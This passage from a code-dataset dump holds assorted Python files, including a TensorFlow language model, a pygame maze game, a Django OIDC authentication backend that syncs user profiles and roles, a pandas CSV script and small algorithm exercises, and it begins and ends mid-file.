[-1,1])\n hidden = output\n loss = tf.nn.nce_loss(w, b,\n hidden,\n labels,\n num_samples,\n vocab_size)\n elif self.loss_fct == \"sampledsoftmax\":\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n num_samples = 1024\n labels = tf.reshape(self._targets, [-1,1])\n hidden = output\n\n loss = self.sampled_softmax(w, b, labels, hidden, num_samples, mask)\n\n else:\n raise ValueError(\"Unsupported loss function: %s\" % loss_fct)\n self._cost = cost = tf.reduce_sum(loss) / batch_size\n self._final_state = state\n\n if not is_training:\n return\n\n self._lr = tf.Variable(0.0, trainable=False)\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),\n config.max_grad_norm)\n optimizer = tf.train.GradientDescentOptimizer(self._lr)\n self._train_op = optimizer.apply_gradients(\n zip(grads, tvars),\n global_step=tf.contrib.framework.get_or_create_global_step())\n\n self._new_lr = tf.placeholder(\n tf.float32, shape=[], name=\"new_learning_rate\")\n self._lr_update = tf.assign(self._lr, self._new_lr)\n\n def assign_lr(self, session, lr_value):\n session.run(self._lr_update, feed_dict={self._new_lr: lr_value})\n\n def sampled_softmax(self, w, b, labels, hidden, num_samples, mask):\n vocab_size = self.vocab_size\n def _loss_fct(inputs_, labels_):\n labels_ = tf.reshape(labels_, [-1, 1])\n return tf.nn.sampled_softmax_loss(\n w, b, inputs_, labels_, num_samples, vocab_size)\n\n loss = tf.nn.seq2seq.sequence_loss_by_example(\n [ hidden],\n [ labels ],\n [ mask],\n num_samples,\n softmax_loss_function=_loss_fct)\n return loss\n\n def softmax(self, output, w, b, mask):\n logits = tf.matmul(output, w)+b\n loss = tf.nn.seq2seq.sequence_loss_by_example(\n [logits],\n [tf.reshape(self._targets, [-1])],\n [mask])\n probs = tf.nn.softmax(logits)\n\n return loss, logits, probs\n\n @property\n def initial_state(self):\n return self._initial_state\n\n @property\n def cost(self):\n return self._cost\n\n @property\n def final_state(self):\n return self._final_state\n\n @property\n def lr(self):\n return self._lr\n\n @property\n def train_op(self):\n return self._train_op\n\n\ndef run_epoch(session, model, data, eval_op=None, verbose=False, idict=None, saver=None, action=\"\", log=10):\n \"\"\"Runs the model on the given data.\n Returns:\n - if idict is set (prediction mode):\n a tuple ppl, predictions\n - else if loglikes:\n loglikes (-costs/log(10))\n - else:\n perxplexity= exp(costs/iters)\n \"\"\"\n epoch_size = ((len(data) // model.batch_size) - 1) // model.num_steps\n config = model.config\n costs = 0.0\n iters = 0\n\n last_step = config.step if model.is_training else 0\n if last_step > 0:\n state = _load_state()\n print(\"Last step: %d\" % last_step)\n else:\n state = session.run(model.initial_state)\n predictions = []\n\n word_probs = []\n\n start_time = time.time()\n for step, (x, y) in enumerate(reader.iterator(data, model.batch_size,\n model.num_steps)):\n if last_step > step: continue\n\n fetches = {\"cost\": model.cost, \"state\": model.final_state, \"probs\": model.probs}\n\n if eval_op is not None:\n fetches[\"eval_op\"] = eval_op\n\n feed_dict = {}\n feed_dict[model._input_data] = x\n feed_dict[model._targets] = y\n for i, (c, h) in enumerate(model.initial_state):\n feed_dict[c] = state[i].c\n feed_dict[h] = state[i].h\n\n\n # Catching error & returning -99 as we may need an output for each input\n # (can't just ignore)\n try:\n vals = session.run(fetches, feed_dict)\n except ValueError as e:\n print(\"[ERROR] Error while running step %d (value: =\\\"%s\\\")\" % (step, str(x)),\n\t\tfile=sys.stderr)\n print(\"[ERROR] Aborting run_step; returning -99\", file=sys.stderr)\n print(e, file=sys.stderr)\n return -99.0\n\n cost = vals['cost']\n state = vals['state']\n probs = vals['probs']\n costs += cost\n iters += model.num_steps\n\n word_probs.append(probs[0][y[0][0]])\n\n # Predict mode\n if idict is not None:\n probs = probs[0]\n next_id = np.argmax(probs)\n xx = x[0][0]\n yy = y[0][0]\n prediction = {\n 'word': idict[xx],\n \"target\": idict[yy],\n \"prob\": float(probs[yy]),\n \"pred_word\": idict[next_id],\n \"pred_prob\": float(probs[next_id]),\n }\n predictions.append(prediction)\n\n # Logging results & Saving\n if log<0 or log>100:\n log = 10\n if verbose and step % (epoch_size // log) == 1:\n print(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / iters),\n iters * model.batch_size / (time.time() - start_time)))\n if saver is not None:\n _save_checkpoint(saver, session, \"ep_%d_step_%d.ckpt\" % (config.epoch, step))\n _save_state(state)\n config.step = step\n config.save()\n\n\n config.step = 0\n\n\n # Perplexity and loglikes\n ppl = np.exp(costs / iters)\n ll = -costs / np.log(10)\n\n if action == \"ppl\":\n return ppl\n elif action == \"loglikes\":\n return ll\n elif action == \"predict\":\n return predictions\n elif action == \"probs\":\n return shift(word_probs, 1, cval=0.)\n\n return None\n\ndef _save_checkpoint(saver, session, name):\n path = os.path.join(FLAGS.model_dir, name)\n print(\"Saving %s\" % path)\n saver.save(session, path)\n\ndef _state_path():\n return os.path.join(FLAGS.model_dir, \"state\")\n\ndef _load_state():\n with open(_state_path(), 'r') as f:\n return pickle.load(f)\n\ndef _save_state(state):\n with open(_state_path(), 'w') as f:\n pickle.dump(state, f)\n\nfrom config import Config\ndef get_config():\n params = {key: FLAGS.__getattr__(key) for key in MODEL_PARAMS}\n config_path = os.path.join(FLAGS.model_dir, \"config\")\n return Config(config=FLAGS.config, path=config_path, params=params)\n\ndef _restore_session(saver, session):\n ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(session, ckpt.model_checkpoint_path)\n return session\n else:\n raise ValueError(\"No checkpoint file found\")\n\n\nimport os\nimport pickle\nimport util\ndef main(_):\n assert(FLAGS.action in ACTIONS)\n assert(FLAGS.loss in LOSS_FCTS)\n\n loss_fct = FLAGS.loss\n action = FLAGS.action\n\n train = action in [\"train\", \"continue\"]\n test = action == \"test\"\n linebyline = action in [\"ppl\", \"loglikes\", \"predict\", \"probs\", \"export\"]\n\n util.mkdirs(FLAGS.model_dir)\n\n if not (FLAGS.data_path or linebyline):\n raise ValueError(\"Must set --data_path to data directory\")\n\n config = get_config()\n\n word_to_id_path = os.path.join(FLAGS.model_dir, \"word_to_id\")\n if action != \"train\":\n with open(word_to_id_path, 'r') as f:\n word_to_id = pickle.load(f)\n\n else:\n word_to_id = None\n config.epoch = 1\n config.step = 0\n\n # Reading fast_test.\n # This option is enabled by 'transpose.py'\n fast_test = False\n if \"fast_test\" in config.__dict__:\n # Be sure to set a boolean\n fast_test = True if config.fast_test else False\n\n eval_config = Config(clone=config)\n eval_config.batch_size = 1\n eval_config.num_steps = 1\n\n # Load data\n if not linebyline:\n raw_data = reader.raw_data(FLAGS.data_path, training=train, word_to_id=word_to_id)\n train_data, valid_data, test_data, word_to_id = raw_data\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n\n # Defining model(s)\n if train:\n # Saving word_to_id & conf to file\n with open(word_to_id_path, 'w') as f:\n pickle.dump(word_to_id, f)\n\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=False, initializer=initializer):\n m = Model(is_training=True, config=config, loss_fct=loss_fct)\n tf.scalar_summary(\"Training Loss\", m.cost)\n tf.scalar_summary(\"Learning Rate\", m.lr)\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n mvalid = Model(is_training=False, config=config)\n tf.scalar_summary(\"Validation Loss\", mvalid.cost)\n\n with tf.name_scope(\"Test\"):\n with tf.variable_scope(\"Model\", reuse=train, initializer=initializer):\n mtest = Model(is_training=False, config=eval_config, test_opti=fast_test)\n\n\n saver = tf.train.Saver()\n init_op = tf.global_variables_initializer()\n with tf.Session() as session:\n session.run(init_op)\n if train:\n config.save()\n if action == \"continue\":\n session = _restore_session(saver, session)\n\n saver = None if FLAGS.nosave else saver\n print(\"Starting training from epoch %d using %s\" % (config.epoch, loss_fct))\n\n while config.epoch <= config.max_max_epoch:\n i = config.epoch\n lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n m.assign_lr(session, config.learning_rate * lr_decay)\n\n print(\"Epoch: %d Learning rate: %.3f\" % (i, session.run(m.lr)))\n train_perplexity = run_epoch(session, m, train_data, eval_op=m.train_op,\n verbose=True, saver=saver, log=FLAGS.log)\n print(\"Epoch: %d Train Perplexity: %.3f\" % (i, train_perplexity))\n\n valid_perplexity = run_epoch(session, mvalid, valid_data)\n print(\"Epoch: %d Valid Perplexity: %.3f\" % (i, valid_perplexity))\n\n config.step = 0\n config.epoch += 1\n config.save()\n\n else:\n session = _restore_session(saver, session)\n\n if FLAGS.action == \"export\":\n tf.train.write_graph(session.graph_def, FLAGS.model_dir, 'graph.pb')\n sys.exit()\n\n # Line by line processing (=ppl, predict, loglikes)\n if linebyline:\n while True:\n lines = sys.stdin.readline()\n if not lines: break\n\n lines = lines.strip().split('\\t')\n results = []\n for line in lines:\n idict = None\n test_data = sentence_cleaner.clean(line,word_to_id)\n\n if len(test_data) < 2:\n print(-9999)\n continue\n\n inverse_dict = dict(zip(word_to_id.values(), word_to_id.keys()))\n result = run_epoch(session, mtest, test_data, idict=inverse_dict, action=FLAGS.action)\n results.append((test_data, result))\n\n if FLAGS.action == 'predict':\n print(json.dumps(results))\n\n if FLAGS.action in ['ppl', 'loglikes']:\n if len(lines) is 2:\n print(\"%.2f, %.2f, %.2f\" % (results[0][1], results[1][1], results[0][1] - results[1][1]))\n if FLAGS.debug is True:\n print(lines)\n else:\n if results[0][1] > FLAGS.threshold:\n print(\"%.2f\" % results[0][1])\n\n elif FLAGS.action == \"probs\":\n for j, result in enumerate(results):\n\n if FLAGS.debug is True:\n print(lines[j])\n\n out_str = \"\"\n test_data = result[0]\n probs = result[1]\n count = 0\n for i, prob in enumerate(probs):\n if i == 0:\n continue\n\n if FLAGS.debug is True:\n out_str += \"(%s %.3f) \" % (inverse_dict[test_data[i]], prob*100)\n\n if prob*100 < FLAGS.threshold:\n count = count + 1\n\n if FLAGS.debug is True:\n print(out_str)\n\n if count > 0:\n print(\"{:.2f}% words below {:.3f} prob\".format((count/(len(probs) - 1)*100), FLAGS.threshold))\n\n # Whole text processing\n elif test:\n test_perplexity = run_epoch(session, mtest, test_data)\n print(\"Test Perplexity: %.3f\" % test_perplexity)\n\nif __name__ == \"__main__\":\n tf.app.run()\n\n","sub_path":"word_lm.py","file_name":"word_lm.py","file_ext":"py","file_size_in_byte":19884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186049056","text":"import pygame,sys\nfrom pygame.locals import *\nfrom math import ceil\npygame.init()\nBG = 255,255,255\nvideo_infos = pygame.display.Info()\nheight, width =video_infos.current_h - 20 , video_infos.current_w-30\nmaze=pygame.image.load(\"maze.png\")\nif maze.get_size()[0]ball physics--#\nvx,vy = 0,0\nbounce=0.1\nx , y =30,0\n#!--main loop--#\nFPS=30\ntick=round(1000/FPS)\nwhile True:\n pygame.time.wait(tick)\n #!--shutoff detection--#\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n #!--ball control--#\n keys=pygame.key.get_pressed()\n #!--win detection--#\n \n if x > bound_x and y > bound_y:\n pygame.time.wait(1000)\n screen.fill((0,255,0))\n font = pygame.font.Font('freesansbold.ttf', 32) \n text = font.render('you win', True, (0,0,0) ,(0,255,0)) \n textRect = text.get_rect() \n textRect.center = (width/ 2, height/ 2)\n screen.blit(text,textRect)\n pygame.display.flip()\n pygame.time.wait(2000)\n pygame.quit()\n sys.exit()\n #!--collision detection--#\n elif maze_mask.overlap(ball_mask,((ceil(x+vx),ceil(y+vy)))) != None :\n x-=vx\n y-=vy\n else:\n if keys[K_LEFT]:\n vx-=accel\n if keys[K_RIGHT]:\n vx+=accel\n if keys[K_UP]:\n vy-=accel\n if keys[K_DOWN]:\n vy+=accel\n\n \n #!--friction--#\n if vx!=0:\n vx+= (0-vx)/3\n if vy!=0:\n vy+= (0-vy)/3\n x+=vx\n y+=vy\n \n #!--draw--#\n screen.fill(BG)\n pygame.draw.rect(screen,(0,255,0),(bound_x,bound_y,win_size,win_size))\n screen.blit(ball,(x,y))\n screen.blit(maze,(0,0))\n pygame.display.flip()\n\n \n \n\n","sub_path":"old/stuff/pythonproj/maze/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"36544472","text":"# -*- coding: utf-8 -*-\n# -*- coding: utf-8 -*-\nimport logging\nimport logging.handlers\nimport time\nfrom logging import Logger\n\n\nclass BaseLogger(Logger):\n def __init__(self, path=None):\n super(BaseLogger, self).__init__(self)\n # 日志文件名\n if path is None:\n from multone.settings import LOG_PATH\n path = LOG_PATH\n filename = path + '/' + str(time.strftime(\"%Y-%m-%d\", time.localtime())) + '.log'\n self.filename = filename\n\n # 创建一个handler,用于写入日志文件 (每天生成1个,保留30天的日志)\n fh = logging.handlers.TimedRotatingFileHandler(self.filename, 'D', 1, 30)\n fh.suffix = \"%Y%m%d-%H%M.log\"\n fh.setLevel(logging.WARNING)\n\n # 再创建一个handler,用于输出到控制台\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # 定义handler的输出格式\n formatter = logging.Formatter('[%(asctime)s] %(filename)s[Line:%(lineno)d] [%(levelname)s] %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n # 给logger添加handler\n self.addHandler(fh)\n self.addHandler(ch)\n\n\n\n","sub_path":"multone/extensions/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133783952","text":"#-*-coding:utf-8-*-\nimport random\nimport time\n\nfrom action_base import ActionBase\n\nclass Ghost(ActionBase):\n\n # 2 hour\n REST_DURATION = 120 * 60.\n SERIFS = [\n # \"い、入れ替わってる!?\",\n # \"オイラのゴーストが、そう囁くのよ\",\n \"オイラは日本橋の人びとの集合意識から生まれたひとつの人格なのじゃよ\",\n \"オイラは日本橋にいる全員の意識と繋がる事もできるのじゃ!\",\n \"この声は脳に直接響いているのじゃぞ\",\n \"現在、のれんネットワークアップデート中じゃ\",\n ]\n\n def __init__(self, speaker):\n super(Ghost, self).__init__(speaker)\n\n def check(self, data):\n # 入り口にひとがいない、風がゆらゆら\n duration = data[\"now\"] - self._last_running_time\n is_no_one = data[\"tracking\"][0].get(\"status\", 0) == 0\n wind_status = data[\"accelerometer\"].get(\"status\", 0)\n return duration > self.REST_DURATION and is_no_one and wind_status > 0 and random.random() > .3\n\n def run(self, data):\n serif = self.SERIFS[int(random.random()*len(self.SERIFS))]\n self._sp.say(serif)\n time.sleep(1.)\n self._last_running_time = time.time()\n\n return serif\n","sub_path":"python/action/ghost.py","file_name":"ghost.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338750464","text":"\"\"\"Contains training/validation loops.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tensorflow as tf\nimport gin\nfrom weighpoint import callbacks as cb\nfrom weighpoint.meta import builder as b\n\n\n@gin.configurable\ndef train(\n model_dir, problem, batch_size, epochs, logits_meta_fn, optimizer,\n callbacks=None, verbose=True, checkpoint_freq=None,\n summary_freq=None, save_config=True, lr_schedule=None):\n # need to run in graph mode for reinitializable iterators\n if model_dir is not None:\n model_dir = os.path.expanduser(model_dir)\n datasets = {k: problem.get_dataset(\n split=k, batch_size=None, prefetch=False)\n for k in ('train', 'validation')}\n\n builder = b.MetaNetworkBuilder()\n with builder:\n inputs = builder.prebatch_inputs_from(datasets['train'])\n logits = logits_meta_fn(inputs, problem.output_spec())\n if isinstance(logits, tf.RaggedTensor):\n assert(logits.ragged_rank == 1)\n logits = logits.values\n\n preprocessor = builder.preprocessor()\n model = builder.model((logits,))\n model.compile(\n optimizer=optimizer,\n loss=problem.loss,\n metrics=problem.metrics)\n\n tf.compat.v1.summary.scalar('lr', model.optimizer.lr)\n custom_summary = tf.compat.v1.summary.merge_all()\n\n train_steps = problem.examples_per_epoch('train') // batch_size\n validation_steps = problem.examples_per_epoch(\n 'validation') // batch_size\n\n def preprocess_dataset(dataset):\n num_parallel_calls = tf.data.experimental.AUTOTUNE\n return preprocessor.map_and_batch(\n dataset.repeat(),\n batch_size=batch_size,\n num_parallel_calls=num_parallel_calls).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n datasets = tf.nest.map_structure(preprocess_dataset, datasets)\n\n iters = tf.nest.map_structure(\n tf.compat.v1.data.make_initializable_iterator, datasets)\n\n callbacks, initial_epoch = cb.get_callbacks(\n model,\n callbacks=callbacks,\n checkpoint_freq=checkpoint_freq,\n summary_freq=summary_freq,\n save_config=save_config,\n model_dir=model_dir,\n custom_summary=custom_summary,\n train_steps_per_epoch=train_steps,\n val_steps_per_epoch=validation_steps,\n lr_schedule=lr_schedule,\n train_iter=iters['train'],\n val_iter=iters['validation'],\n )\n model.fit(\n iters['train'],\n epochs=epochs,\n verbose=verbose,\n callbacks=callbacks,\n validation_data=iters['validation'],\n steps_per_epoch=train_steps,\n validation_steps=validation_steps,\n initial_epoch=initial_epoch,\n )\n\n\n@gin.configurable\ndef evaluate(\n model_dir, problem, batch_size, logits_meta_fn, optimizer):\n if model_dir is not None:\n model_dir = os.path.expanduser(model_dir)\n dataset = problem.get_dataset(\n split='validation', batch_size=None, prefetch=False)\n\n builder = b.MetaNetworkBuilder()\n with builder:\n inputs = builder.prebatch_inputs_from(dataset)\n logits = logits_meta_fn(inputs, problem.output_spec())\n if isinstance(logits, tf.RaggedTensor):\n assert(logits.ragged_rank == 1)\n logits = logits.values\n\n preprocessor = builder.preprocessor()\n model = builder.model((logits,))\n model.compile(\n optimizer=optimizer,\n loss=problem.loss,\n metrics=problem.metrics)\n\n validation_steps = problem.examples_per_epoch('validation') // batch_size\n\n saver = tf.train.Saver()\n checkpoint = tf.train.latest_checkpoint(model_dir)\n if checkpoint is not None:\n saver.restore(tf.keras.backend.get_session(), checkpoint)\n\n def preprocess_dataset(dataset):\n num_parallel_calls = tf.data.experimental.AUTOTUNE\n return preprocessor.map_and_batch(\n dataset.repeat(),\n batch_size=batch_size,\n num_parallel_calls=num_parallel_calls).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n dataset = preprocess_dataset(dataset)\n exit()\n model.evaluate(dataset, steps=validation_steps)\n","sub_path":"weighpoint/runners.py","file_name":"runners.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"174274295","text":"# Example code, write your program here\n# import pandas as pd\n# df = pd.read_csv('data.csv',header=None)\n# print(df)\nimport pandas as pd\nf = pd.read_csv(\"data.csv\")\nkeep_col = ['first_name','last_name','email','gender']\nnew_f = f[keep_col]\nnew_f.to_csv(\"output/output.csv\", index=False)\n\n# f = pd.read_csv(\"output/output.csv\")\n# print(f)\n\n\n","sub_path":"analysis/submissions/e88d1e36c4db7410802b3fda6db81d38_task2-1_1597075724/task2-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507259267","text":"# occurs when a very small absolute number added to a very large abs. number\ndx = 1.e-8\nx = 1.e10\n\ncounter = 1000000\n\nfor i in range(counter):\n x += dx\n\nprint (x)\n\ntmp = 0.\n\nfor i in range(counter):\n tmp += dx\n\nx += tmp\n\nprint (x)\n","sub_path":"numerical_errors/information_loss.py","file_name":"information_loss.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85417510","text":"\"\"\"\nThis package contains customisations specific to the Girl Effect project.\nThe technical background can be found here:\nhttps://mozilla-django-oidc.readthedocs.io/en/stable/installation.html#additional-optional-configuration\n\"\"\"\nimport logging\nfrom datetime import datetime\n\nfrom wagtail.core.models import Site\nfrom django.contrib.auth.models import Group, User\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.core.exceptions import FieldError, SuspiciousOperation\n\nfrom mozilla_django_oidc.auth import OIDCAuthenticationBackend\nfrom molo.profiles.models import UserProfile\n\n\nUSERNAME_FIELD = \"username\"\nEMAIL_FIELD = \"email\"\nSUPERUSER_GROUP = 'product_tech_admin'\nLOGGER = logging.getLogger(__name__)\n\n\ndef _update_user_from_claims(user, claims):\n \"\"\"\n Update the user profile with information from the claims.\n This function is called on registration (new user) as well as login events.\n This function provides the mapping from the OIDC claims fields to the\n internal user profile fields.\n We use the role names as the names for Django\n Groups to which a user belongs.\n :param user: The user profile\n :param claims: The claims for the profile\n \"\"\"\n LOGGER.debug(\"Updating user {} with claims: {}\".format(user, claims))\n data = {\n 'first_name': claims.get(\"given_name\") or claims.get(\"nickname\", \"\"),\n 'last_name': claims.get(\"family_name\", \"\"),\n 'email': claims.get(\"email\", \"\"),\n 'username': user.username,\n 'date_joined': user.date_joined,\n 'is_active': user.is_active\n }\n form = UserChangeForm(instance=user, data=data)\n if form.is_valid():\n user.first_name = \\\n claims.get(\"given_name\") or claims.get(\"nickname\", \"\")\n user.last_name = claims.get(\"family_name\", \"\")\n user.email = claims.get(\"email\", \"\")\n user.save()\n else:\n for e in form.errors:\n raise FieldError(e[0])\n\n username = claims.get(\"preferred_username\", \"\")\n\n # If the user doesn't have a profile for some reason make one\n if not hasattr(user, 'profile'):\n user.profile = UserProfile(user=user)\n\n # TODO: we should be using a more specific site here?\n user.profile.site = Site.objects.get(is_default_site=True)\n\n # Ensure the profile is linked to their auth service account using the uuid\n if user.profile.auth_service_uuid is None:\n user.profile.auth_service_uuid = claims.get(\"sub\")\n\n # If a user already exists with this username\n # change that user's username\n if username:\n for u in User.objects.filter(\n username=username).exclude(pk=user.pk):\n if u.profile and u.profile.auth_service_uuid is None:\n u.username = str(u.profile.site.pk) + '_' + username\n u.save()\n else:\n raise FieldError(\n 'Desired username clashes with user with pk %s whose'\n ' profile has auth_service_uuid' % u.pk)\n user.username = username\n user.save()\n\n # Synchronise a user's profile data\n user.profile.gender = claims.get(\"gender\", \"-\").lower()[0]\n date_of_birth = claims.get(\"birthdate\", None)\n if date_of_birth:\n date_of_birth = datetime.strptime(date_of_birth, \"%Y-%m-%d\").date()\n user.profile.date_of_birth = date_of_birth\n if user.profile.alias is None or user.profile.alias == \"\":\n user.profile.alias = user.username\n elif user.profile.alias != user.username:\n user.profile.alias = user.username\n user.profile.save()\n\n # Synchronise the roles that the user has.\n # The list of roles may contain more or less roles\n # than the previous time the user logged in.\n auth_service_roles = set(claims.get(\"roles\", []))\n wagtail_groups = set(group.name for group in user.groups.all())\n\n # If the user has any role, add the wagtail group equivalent\n # to that role to the user\n if auth_service_roles:\n groups_to_add = auth_service_roles - wagtail_groups\n groups_to_remove = wagtail_groups - auth_service_roles\n for group_name in groups_to_add:\n if group_name == SUPERUSER_GROUP:\n user.is_staff = True\n user.is_superuser = True\n user.save()\n else:\n try:\n wagtail_group = Group.objects.get(name=group_name)\n user.groups.add(wagtail_group)\n except Group.DoesNotExist:\n LOGGER.debug(\"Group {} does not exist\".format(group_name))\n # Remove the user's revoked role\n if user.is_superuser and SUPERUSER_GROUP not in auth_service_roles:\n user.is_superuser = False\n user.save()\n\n for group_name in groups_to_remove:\n try:\n wagtail_group = Group.objects.get(name=group_name)\n user.groups.remove(wagtail_group)\n except Group.DoesNotExist:\n LOGGER.debug(\"Group {} does not exist\".format(group_name))\n\n if not user.is_staff and user.groups.all().exists():\n user.is_staff = True\n user.save()\n\n else:\n user.groups.clear()\n user.is_staff = False\n user.save()\n\n\nclass GirlEffectOIDCBackend(OIDCAuthenticationBackend):\n\n def filter_users_by_claims(self, claims):\n \"\"\"\n The default behaviour is to look up users based on their email\n address. However, in the Girl Effect ecosystem the email is optional,\n so we prefer to use the UUID associated with the user profile (\n subject identifier)\n :return: A user identified by the claims, else None\n \"\"\"\n uuid = claims[\"sub\"]\n try:\n kwargs = {'profile__auth_service_uuid': uuid}\n user = self.UserModel.objects.get(**kwargs)\n # Update the user with the latest info\n _update_user_from_claims(user, claims)\n return [user]\n except self.UserModel.DoesNotExist:\n LOGGER.debug(\"Lookup failed based on {}\".format(kwargs))\n\n \"\"\"\n Users with an existing account will be migrated on their first login so\n we find these users based on their User.id\n \"\"\"\n user_id = claims.get(\"migration_information\", {}).get(\"user_id\", None)\n if user_id is not None:\n try:\n kwargs = {'id': user_id}\n user = self.UserModel.objects.get(**kwargs)\n # Update the user with the latest info\n _update_user_from_claims(user, claims)\n return[user]\n except self.UserModel.DoesNotExist:\n LOGGER.debug(\"Lookup failed based on {}\".format(kwargs))\n\n return self.UserModel.objects.none()\n\n def create_user(self, claims):\n \"\"\"Return object for a newly created user account.\n The default OIDC client create_user() function expects an email address\n to be available. This is not the case for Girl Effect accounts, where\n the email field is optional.\n We use the user id (called the subscriber identity in OIDC) as the\n username, since it is always available and guaranteed to be unique.\n \"\"\"\n # If we don't have a username we should break\n username = claims.get(\"preferred_username\")\n email = claims.get(\"email\", \"\") # Email is optional\n # We create the user based on the username and optional email fields.\n\n # If a user already exists with this username\n # change that user's username\n for user in self.UserModel.objects.filter(username=username):\n new_username = str(user.profile.site.pk) + '_' + username\n exists = self.UserModel.objects.filter(\n username=new_username).exists()\n\n can_update = user.profile and not user.profile.auth_service_uuid\n if can_update and not exists:\n user.username = new_username\n user.save()\n else:\n raise FieldError(\n 'Desired username clashes with user with pk %s whose'\n ' profile has an auth_service_uuid' % user.pk)\n\n if email:\n user = self.UserModel.objects.create_user(username, email)\n else:\n user = self.UserModel.objects.create_user(username)\n _update_user_from_claims(user, claims)\n return user\n\n def get_or_create_user(self, access_token, id_token, payload):\n \"\"\"\n Returns a User instance if 1 user is found. Creates a user if not found\n and configured to do so. Returns nothing if multiple users are matched.\n \"\"\"\n\n user_info = self.get_userinfo(access_token, id_token, payload)\n username = user_info.get(\"preferred_username\")\n claims_verified = self.verify_claims(user_info)\n\n if not claims_verified:\n raise SuspiciousOperation('Claims verification failed')\n\n users = self.filter_users_by_claims(user_info)\n\n if len(users) == 1:\n return self.update_user(users[0], user_info)\n\n elif len(users) > 1:\n # In the rare case that two user accounts have the same email,\n # bail. Randomly selecting one seems really wrong.\n raise SuspiciousOperation('Multiple users returned')\n\n elif self.get_settings('OIDC_CREATE_USER', True):\n user = self.create_user(user_info)\n return user\n\n else:\n LOGGER.debug('Login failed: No user with username %s found, and '\n 'OIDC_CREATE_USER is False', username)\n return None\n\n def verify_claims(self, claims):\n \"\"\"\n Verify the provided claims to decide\n if authentication should be allowed.\n \"\"\"\n\n # Verify claims required by default configuration\n scopes = self.get_settings('OIDC_RP_SCOPES', 'openid email')\n if 'preferred_username' in scopes.split():\n return 'preferred_username' in claims\n\n LOGGER.warning(\n 'Custom OIDC_RP_SCOPES defined. You need to override'\n ' `verify_claims` for custom claims verification.'\n )\n return True\n\n def verify_token(self, token, **kwargs):\n site = self.request.site\n if not hasattr(site, \"oidcsettings\"):\n raise RuntimeError(\n \"Site {} has no settings configured.\".format(site))\n\n self.OIDC_RP_CLIENT_SECRET = site.oidcsettings.oidc_rp_client_secret\n return super(GirlEffectOIDCBackend, self).verify_token(token, **kwargs)\n\n def authenticate(self, **kwargs):\n if \"request\" in kwargs:\n site = kwargs[\"request\"].site\n if not hasattr(site, \"oidcsettings\"):\n raise RuntimeError(\n \"Site {} has no settings configured.\".format(site))\n\n self.OIDC_RP_CLIENT_ID = site.oidcsettings.oidc_rp_client_id\n self.OIDC_RP_CLIENT_SECRET = \\\n site.oidcsettings.oidc_rp_client_secret\n return super(GirlEffectOIDCBackend, self).authenticate(**kwargs)\n","sub_path":"gem/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447709598","text":"from typing import List\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n window = []\n res = []\n for i, num in enumerate(nums):\n if window and i - window[0] >= k:\n window.pop(0)\n while window and nums[window[-1]] < num:\n window.pop()\n window.append(i)\n if i >= k - 1:\n res.append(nums[window[0]])\n return res\n \n def maxSlidingWindow2(self, nums: List[int], k: int) -> List[int]:\n if k >= len(nums):\n return [max(nums)]\n \n from collections import deque\n # monotonic queue - 递减\n q = deque() # element is tuple (index, num)\n res = []\n\n for i, num in enumerate(nums):\n while q and q[-1][1] < num:\n q.pop()\n q.append((i, num))\n if i - q[0][0] + 1 > k:\n q.popleft()\n if i >= k - 1:\n res.append(q[0][1])\n return res\n\n \n\n","sub_path":"239_SlidingWindowMaximum.py","file_name":"239_SlidingWindowMaximum.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481088951","text":"# 31996\t92\nfrom collections import deque\nfrom sys import stdin\nboard = [0] * 101\ns_count, l_count = map(int, stdin.readline().split())\n\nevents = list(range(101)) # 뱀과 사다리 고려한 위치\nfor _ in range(s_count + l_count):\n start, end = map(int, stdin.readline().split())\n events[start] = end\n\ndef bfs(x):\n queue = deque()\n queue.append(x)\n\n while queue:\n a = queue.popleft()\n\n for i in range(1,7): # 1~6까지 주사위 나왔을 때 고려\n pos = a + i\n\n if pos > 100: continue # 조건1: 보드판 안에 위치\n pos = events[pos] # 뱀과 사다리 고려한 현재 